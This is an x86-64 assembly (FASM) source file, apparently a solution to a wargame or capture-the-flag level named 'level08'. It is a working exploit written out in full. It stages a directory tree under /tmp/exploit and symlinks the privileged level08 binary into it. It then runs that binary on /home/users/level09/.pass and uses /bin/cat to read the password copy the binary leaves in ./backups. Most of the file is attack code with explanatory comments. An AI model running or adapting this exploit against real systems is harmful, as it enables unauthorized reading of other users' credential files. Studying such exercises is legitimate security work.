; FASM (flat assembler) source, Intel operand order, x86-64 Linux.
; Output: a static ELF64 executable; the trailing number is the ELF OS ABI
; byte (3 = GNU/Linux). No libc — everything below is raw syscalls.
format ELF64 executable $03
entry _start
; string <bytes...>: emits the bytes under the instance label and defines
; <label>.length = number of bytes emitted (used as the write() length of
; _cant_create_tmp in _start).
struc string data*& {
.: db data
.length = ($ - .)
}
; struct timespec { time_t tv_sec; long tv_nsec; } — two qwords.
struc timespec {
.tv_sec: rq $01
.tv_nsec: rq $01
}
; Instantiate the struc at address 0 inside a virtual block so that
; timespec.tv_sec = 0, timespec.tv_nsec = 8 and timespec.sizeof = 16 are
; pure offsets; no bytes are emitted into the image.
virtual at $00
timespec timespec
timespec.sizeof = $
end virtual
; POSIX mode bits; the comment gives the usual octal spelling.
S_IRWXU = $01C0 ; 0700
S_IRWXG = $0038 ; 0070
S_IRWXO = $0007 ; 0007
S_IRGRP = $0020 ; 0040
S_IWGRP = $0010 ; 0020
S_IROTH = $0004 ; 0004
S_IWOTH = $0002 ; 0002
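segment executable readable

; Linux x86-64 syscall numbers used below. Convention: rax = number, args
; in rdi, rsi, rdx; result in rax, negative = -errno; rcx and r11 are
; clobbered by the `syscall` instruction itself.
SYS_write     = $01
SYS_close     = $03
SYS_nanosleep = $23
SYS_fork      = $39
SYS_execve    = $3B
SYS_exit      = $3C
SYS_chdir     = $50
SYS_mkdir     = $53
SYS_creat     = $55
SYS_symlink   = $58
SYS_chmod     = $5A

STDERR        = $02
EXIT_FAILURE  = $01

;-----------------------------------------------------------------------
; _start — program entry point (no libc).
;
; Stages a scratch tree under /tmp/exploit, then forks:
;   child : execve("./level08", ["./level08", "/home/users/level09/.pass"])
;           where ./level08 is a symlink to the real level08 binary, so a
;           relative "./backups/..." used by the target resolves inside
;           the tree built here.
;   parent: nanosleep 1 s, then execve("/bin/cat", ["/bin/cat", _retrieve])
;           where _retrieve reads "./backups/home/users/level09/.pass"
;           (it deliberately runs into _argument in the data segment).
;
; The premise — that the target copies its argument to ./backups/<path>
; and writes ./backups/.log — is inferred from the layout created here,
; not visible in this file; confirm against the target before relying
; on it.
;
; Exit status: every exit that is actually reached is a failure, because
; a successful execve never returns. All failure paths therefore exit
; with status 1 (the previous version exited 0 everywhere, hiding errors
; from the calling shell). Only the first mkdir failure prints a message;
; the likely cause there is that /tmp/exploit already exists — a fixed,
; predictable /tmp name is something another local user can pre-create.
; fork() failure (negative rax) is now treated as an error instead of as
; the parent path.
;-----------------------------------------------------------------------
_start:
        ; mkdir("/tmp/exploit", 0777) — EEXIST or an unwritable /tmp → .error
        mov     rax, SYS_mkdir
        mov     rdi, _tmp
        mov     rsi, S_IRWXU or S_IRWXG or S_IRWXO
        syscall
        test    rax, rax
        jnz     .error

        ; chdir("/tmp/exploit") — every relative path below is rooted here
        mov     rax, SYS_chdir
        mov     rdi, _tmp
        syscall
        test    rax, rax
        jnz     .fail

        ; Create ./backups/home/users/level09 one component at a time
        ; (_path_1.._path_4 are parent-before-child, keep that order) and
        ; chmod each to 0777 so the umask does not narrow the mode.
        rept $04 i:$01
        {
        mov     rax, SYS_mkdir
        mov     rdi, _path_#i
        mov     rsi, S_IRWXU or S_IRWXG or S_IRWXO
        syscall
        test    rax, rax
        jnz     .fail
        mov     rax, SYS_chmod
        mov     rdi, _path_#i
        mov     rsi, S_IRWXU or S_IRWXG or S_IRWXO
        syscall
        test    rax, rax
        jnz     .fail
        }

        ; creat("./backups/.log", 0766) → fd in rax (negative = -errno)
        mov     rax, SYS_creat
        mov     rdi, _log
        mov     rsi, S_IRWXU or S_IRGRP or S_IWGRP or S_IROTH or S_IWOTH
        syscall
        test    rax, rax
        js      .fail
        ; close(fd) — only the file's existence is needed, not the handle
        mov     rdi, rax
        mov     rax, SYS_close
        syscall
        ; chmod("./backups/.log", 0766) — creat's mode was subject to umask
        mov     rax, SYS_chmod
        mov     rdi, _log
        mov     rsi, S_IRWXU or S_IRGRP or S_IWGRP or S_IROTH or S_IWOTH
        syscall
        test    rax, rax
        jnz     .fail

        ; symlink("/home/users/level08/level08", "./level08")
        mov     rax, SYS_symlink
        mov     rdi, _program
        mov     rsi, _current
        syscall
        test    rax, rax
        jnz     .fail

        ; fork(): rax = 0 in the child, pid in the parent, negative on error
        mov     rax, SYS_fork
        syscall
        test    rax, rax
        js      .fail
        jz      .child

        ; Parent: nanosleep({tv_sec = 1, tv_nsec = 0}, NULL) to give the
        ; child time to run. NOTE(review): this is a fixed delay, not a
        ; wait4() on the child, so a slow target loses the race.
        sub     rsp, timespec.sizeof
        mov     qword [rsp+timespec.tv_sec], $01
        mov     qword [rsp+timespec.tv_nsec], $00
        mov     rax, SYS_nanosleep
        mov     rdi, rsp
        xor     esi, esi                ; rem = NULL
        syscall
        add     rsp, timespec.sizeof

        ; Parent: execve("/bin/cat", ["/bin/cat", _retrieve, NULL], NULL)
        ; argv is built on the stack: pushed in reverse so rsp -> argv[0].
        mov     rax, SYS_execve
        mov     rdi, _cat
        mov     rcx, _retrieve
        xor     edx, edx                ; envp = NULL; also argv terminator
        push    rdx rcx rdi
        mov     rsi, rsp
        syscall
        jmp     .fail                   ; execve returns only on failure

.child:
        ; Child: execve("./level08", ["./level08", _argument, NULL], NULL)
        mov     rax, SYS_execve
        mov     rdi, _current
        mov     rcx, _argument
        xor     edx, edx
        push    rdx rcx rdi
        mov     rsi, rsp
        syscall
        ; fall through: execve failed

.fail:
        ; exit(1) — reached only when some step above failed
        mov     rax, SYS_exit
        mov     rdi, EXIT_FAILURE
        syscall

.error:
        ; write(2, "[ERROR]: Can't create /tmp/exploit\n", len), then exit(1)
        mov     rax, SYS_write
        mov     rdi, STDERR
        mov     rsi, _cant_create_tmp
        mov     rdx, _cant_create_tmp.length
        syscall
        jmp     .fail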
segment readable
; Read-only strings referenced from _start by absolute address (this is a
; static, non-PIE ELF, so absolute immediates are fine).
; Real target binary, and the relative name it is reached through after
; _start symlinks the former to the latter inside /tmp/exploit.
_program: db "/home/users/level08/level08", $00
_current: db "./level08", $00
_cat: db "/bin/cat", $00
; NOTE: _retrieve has NO terminator on purpose. It runs straight into
; _argument, so as a C string it reads
;     "./backups/home/users/level09/.pass"
; while _argument on its own is "/home/users/level09/.pass". The two must
; stay adjacent and in this order — inserting anything between them
; changes the path handed to /bin/cat in _start.
_retrieve: db "./backups"
_argument: db "/home/users/level09/.pass", $00
; Fixed, predictable scratch directory. mkdir fails (e.g. EEXIST if another
; local user pre-created it), which _start reports via _cant_create_tmp.
_tmp: db "/tmp/exploit", $00
; `string` struc: also defines _cant_create_tmp.length for the write() call.
_cant_create_tmp string "[ERROR]: Can't create /tmp/exploit", $0A
; Directory chain created in order 1..4; each entry is the parent of the next.
_path_1: db "./backups", $00
_path_2: db "./backups/home", $00
_path_3: db "./backups/home/users", $00
_path_4: db "./backups/home/users/level09", $00
; Created empty and chmod'ed to 0766 by _start.
_log: db "./backups/.log", $00